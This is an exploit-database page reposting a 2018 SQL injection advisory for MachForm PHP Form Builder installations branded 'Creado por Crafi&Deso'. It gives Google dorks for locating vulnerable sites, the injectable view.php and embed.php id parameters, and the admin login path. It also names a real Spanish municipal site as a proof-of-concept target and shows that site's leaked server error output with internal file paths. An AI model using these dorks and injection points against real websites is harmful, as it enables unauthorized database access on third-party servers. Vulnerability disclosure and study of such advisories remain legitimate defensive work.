Advertisement






Creado por Crafi&Deso MachForm PHP Form Builder Spain SQL Injection Vulnerability

CVE Category Price Severity
CWE-89 Not specified High
Author Risk Exploitation Type Date
Crafi & Deso High Remote 2018-06-22
CVSS EPSS EPSSP
CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N 0.66292 0.89748

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018060229

Below is a copy:

Creado por Crafi&Deso MachForm PHP Form Builder Spain SQL Injection Vulnerability
#################################################################################################

# Exploit Title : Creado por Crafi&Deso MachForm PHP Form Builder Spain SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 22/06/2018
# Vendor Homepage : machform.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]

#################################################################################################

# Google Dorks : 

intext:''Creado por CRAFI&DESO''

intext:''Creado por: CRAFI&DESO  Copyright indefinido - Diseo e imagen''

intext:''MachForm - PHP Form Builder''

# Exploits : 

/formulario/view.php?id=[SQL Inj]
/formulario/embed.php?id=[SQL Inj]

# Admin Panel Login Path : /formulario/

#################################################################################################

# Example Site :  sanisidro.es/formulario/view.php?id=5%27 => Proof of Concept  => archive.is/4ylLc

# Error in SQL Database : 

Deprecated: Assigning the return value of new by reference is deprecated in /homepages/10/d288254394/htdocs/ayuntamiento/formulario/includes/view-functions.php on line 1561

Deprecated: Assigning the return value of new by reference is deprecated in /homepages/10/d288254394/htdocs/ayuntamiento/formulario/includes/view-functions.php on line 1643

Deprecated: Assigning the return value of new by reference is deprecated in /homepages/10/d288254394/htdocs/ayuntamiento/formulario/includes/view-functions.php on line 1654

Deprecated: Assigning the return value of new by reference is deprecated in /homepages/10/d288254394/htdocs/ayuntamiento/formulario/includes/view-functions.php on line 1704

Deprecated: Assigning the return value of new by reference is deprecated in /homepages/10/d288254394/htdocs/ayuntamiento/formulario/includes/view-functions.php on line 1891

Deprecated: Assigning the return value of new by reference is deprecated in /homepages/10/d288254394/htdocs/ayuntamiento/formulario/includes/view-functions.php on line 1974

Deprecated: Assigning the return value of new by reference is deprecated in /homepages/10/d288254394/htdocs/ayuntamiento/formulario/includes/view-functions.php on line 1985

Deprecated: Assigning the return value of new by reference is deprecated in /homepages/10/d288254394/htdocs/ayuntamiento/formulario/includes/view-functions.php on line 2041

Deprecated: Assigning the return value of new by reference is deprecated in /homepages/10/d288254394/htdocs/ayuntamiento/formulario/includes/view-functions.php on line 2210

Deprecated: Assigning the return value of new by reference is deprecated in /homepages/10/d288254394/htdocs/ayuntamiento/formulario/includes/view-functions.php on line 2270

Deprecated: mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /homepages/10/d288254394/htdocs/ayuntamiento/formulario/includes/db-core.php on line 11

Warning: Cannot modify header information - headers already sent by (output started at /homepages/10/d288254394/htdocs/ayuntamiento/formulario/includes/view-functions.php:1561) in /homepages/10/d288254394/htdocs/ayuntamiento/formulario/view.php on line 89

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

#################################################################################################

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.